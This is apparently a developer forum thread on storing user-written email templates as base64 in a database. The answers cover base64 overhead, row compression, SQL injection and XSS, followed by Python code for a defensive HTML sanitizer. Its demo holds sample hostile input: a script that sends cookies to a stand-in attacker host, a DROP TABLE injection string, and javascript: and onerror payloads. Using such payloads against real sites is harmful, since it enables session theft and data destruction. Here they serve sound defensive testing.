Alex Lord asked:

storing email text based templates as base64_encode and storing in database

PHA+SGV5IChuYW1lKTwvcD4NCg0KDQoNCg0KPHA+VGhhbmsgeW91IGZvciB1c2luZyA8c3Ryb25nPjx1PmNvbXBhbnkmbmJzcDs8L3U+PC9zdHJvbmc+ZGVtbywgd2UgaG9wZSB5b3UgZm91bmQgaXQgd29ydGggd2hpbGUsIGlmIHlvdSB3b3VsZCBsaWtlIGZ1dGhlciBpbmZvbWF0aW9uIHBsZWFzZSBjb250YWN0IHVzPC9wPg0KDQoNCg0KDQo8cD5yZWdhcmRzIHRlc3QgdXNlcjwvcD4NCg0K

base64_encode

So I am creating a basic form to allow users to create text-based email templates. It does include files and images, but only in the format of links which direct the user to the file, so it is still text.

I need to store this in a database, which I have done. I am wondering, is this the best practice? I am using CKEditor too.

Or is there a better way?
lenamtl (Canada):

This sounds ok to me.

I'm doing something similar to this but using TinyMCE and raw output using the template option that can be embedded inside the text editor.
https://www.tiny.cloud/docs/plugins/template/#templates

For my case I'm creating some ready-to-use templates for the user, so the user only needs to select the appropriate template from a list.
Those templates are html/php files loaded inside the editor, so nothing is saved in the DB.
I'm guessing you're using base64 to save a little space.

You can accomplish the same space saving by just using row compression, which will leave your data in human-readable form.

And as lenamtl said, what you're doing will work too.

My preference is to use row compression, so data can be pulled out + used, without doing a base64 decrypt first.
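As an added illustration of the size question argued over in this thread (this is not code from the question or from any of the answers), the following Python takes the template from the question, decoded from the base64 string posted above, and measures it raw, base64-encoded, and zlib-compressed. zlib is used here as a stand-in for the database engine's row compression, which is an assumption of the example; the compressed size will differ by engine, but base64 always lands at 4 output bytes per 3 input bytes.

```python
import base64
import zlib

# The template from the question, base64-decoded (CKEditor output, CRLF line endings).
TEMPLATE_HTML = (
    "<p>Hey (name)</p>" + "\r\n" * 5
    + "<p>Thank you for using <strong><u>company&nbsp;</u></strong>demo, "
      "we hope you found it worth while, if you would like futher infomation "
      "please contact us</p>" + "\r\n" * 5
    + "<p>regards test user</p>" + "\r\n" * 2
)


def storage_sizes(html: str) -> dict:
    """Byte counts for the three ways of putting the same template in a column."""
    raw = html.encode("utf-8")
    b64 = base64.b64encode(raw)        # 4 chars per 3 bytes: always bigger than raw
    packed = zlib.compress(raw, 9)     # stand-in for row compression (assumption)
    return {
        "raw": len(raw),
        "base64": len(b64),
        "base64_ratio": len(b64) / len(raw),
        "zlib": len(packed),
        "zlib_ratio": len(packed) / len(raw),
    }


def roundtrip_ok(html: str) -> bool:
    """Both encodings are lossless; only the stored size differs."""
    raw = html.encode("utf-8")
    return (base64.b64decode(base64.b64encode(raw)) == raw
            and zlib.decompress(zlib.compress(raw, 9)) == raw)


if __name__ == "__main__":
    for name, value in storage_sizes(TEMPLATE_HTML).items():
        print(f"{name:>13}: {value:.3f}" if isinstance(value, float) else f"{name:>13}: {value}")
```

For this 222-byte template the base64 column holds 296 bytes, a 33% increase, while the compressed form is smaller than the raw HTML. Compression belongs to the storage layer (row or page compression in the database), so the application still reads and writes plain HTML and can search it with ordinary string predicates.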
Base64 does not save space. Base64 actually wastes space - it increases overall usage by about 33% on average.

I would suggest not using Base64 at all. The whole point of Base64 encoding is to store binary data using printable characters (which is why it takes up more space - you're trying to fit 256 possible values from one byte into multiple bytes that only have 64 possible values each). It's the equivalent of being asked what your favorite color is and being given the choices of "blue", "green", and "red" - but your favorite color is "cyan", so you pick blue AND green (you've picked multiple colors that, when together, make the original one color).

You can still store it in the database, but either use escaping on the value or use a prepared statement / query to insert the value so you're not opening yourself up to SQL injection.

I'd also HEAVILY caution against any sort of cross-user template usage (e.g. user A creates a template and user B can see it). This is just begging to be abused by a malicious user who injects malicious code into a template. Just because the code can be inserted without SQL injection doesn't mean it's safe. A malicious user could inject some Javascript (e.g. in a <script> tag or an event handler like a click or mousemove), and have it redirect a good user to a bad or malicious site or open them up to XSS (e.g. dump cookies to a remote site and allow session hijacking).

You need to be VERY thorough in validating any input from users. Remember that malicious users don't have to play by the rules. It's easy to bypass any client-side validation and restrictions and simply upload whatever data you want, so you need to actually check the results before allowing them to be used.
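To make the last two points concrete, here is an added Python example; it is not code from the question or the answers, which are about PHP and CKEditor. It shows a server-side allowlist sanitizer that rebuilds the submitted template keeping only a fixed set of tags, attributes and URL schemes (so script tags, on* event handlers and javascript: links cannot survive), plus a store/load pair that binds values with placeholders and scopes reads to the owning user. The table and column names, the hostile submission, and the rule that links must be absolute http/https/mailto URLs are all assumptions of the example; sqlite3 stands in for whatever database the question uses.

```python
import html
import sqlite3
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist: anything not listed here is dropped on the way in.
ALLOWED_TAGS = {"p", "br", "strong", "em", "u", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}   # no javascript:, data:, vbscript:
VOID_TAGS = {"br", "img"}
DROP_WITH_CONTENT = {"script", "style"}      # drop the element and its body


def safe_url(value: str) -> bool:
    # Absolute URLs only (assumption: email templates link out, never relatively).
    return urlparse(value.strip()).scheme.lower() in SAFE_SCHEMES


class TemplateSanitizer(HTMLParser):
    """Re-serialises the input keeping only allowlisted tags and attributes.
    Unknown tags vanish but their text is kept; script/style vanish entirely."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0          # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return
        kept = {}
        for name, value in attrs:
            name = name.lower()
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue   # removes onclick=, onmouseover=, style=, ... by omission
            if name in URL_ATTRS and not safe_url(value):
                continue   # removes href="javascript:..." and src=x
            kept[name] = value
        if tag == "img" and "src" not in kept:
            return         # an <img> with no usable src is just noise
        attr_text = "".join(f' {k}="{html.escape(v, quote=True)}"' for k, v in kept.items())
        self.out.append(f"<{tag}{attr_text}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
            return
        if self.skip or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))   # text can never become markup


def sanitize(untrusted_html: str) -> str:
    parser = TemplateSanitizer()
    parser.feed(untrusted_html)
    parser.close()
    return "".join(parser.out)


SCHEMA = """CREATE TABLE IF NOT EXISTS email_templates (
    id INTEGER PRIMARY KEY, owner_id INTEGER NOT NULL,
    name TEXT NOT NULL, body_html TEXT NOT NULL)"""


def store_template(conn, owner_id: int, name: str, untrusted_html: str) -> int:
    # Sanitize once on input; bind with placeholders so quotes in the body are data, not SQL.
    cur = conn.execute(
        "INSERT INTO email_templates (owner_id, name, body_html) VALUES (?, ?, ?)",
        (owner_id, name, sanitize(untrusted_html)),
    )
    return cur.lastrowid


def load_template(conn, owner_id: int, template_id: int):
    # The owner is part of the lookup: user B cannot fetch user A's template by guessing its id.
    row = conn.execute(
        "SELECT body_html FROM email_templates WHERE id = ? AND owner_id = ?",
        (template_id, owner_id),
    ).fetchone()
    return None if row is None else row[0]


def demo():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    # Constructed hostile submission: what a user can POST once client-side checks are bypassed.
    hostile = (
        '<p onmouseover="steal()">Hi <strong>there</strong>'
        '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
        '<a href="javascript:alert(1)">click</a>'
        '<a href="https://example.com/brochure.pdf">brochure</a>'
        '<img src=x onerror=alert(1)>'
        "<p>'); DROP TABLE email_templates; --</p>"
    )
    tid = store_template(conn, owner_id=1, name="welcome", untrusted_html=hostile)
    as_owner = load_template(conn, owner_id=1, template_id=tid)
    as_other_user = load_template(conn, owner_id=2, template_id=tid)
    return as_owner, as_other_user


if __name__ == "__main__":
    print(demo()[0])
```

Run stand-alone, `demo()` stores the hostile template and returns it as the owner sees it: the script body, the event handlers and the javascript: link are gone, the brochure link survives, and the injection attempt is stored as harmless text because the value was bound rather than concatenated into the SQL. The second return value is None, since user 2 does not own the row. The PHP equivalents are prepared statements (PDO or mysqli) for the insert and a maintained library such as HTML Purifier for the sanitizing step; hand-rolled sanitizers like this one are easy to get subtly wrong, so treat it as an illustration of the allowlist idea rather than something to ship.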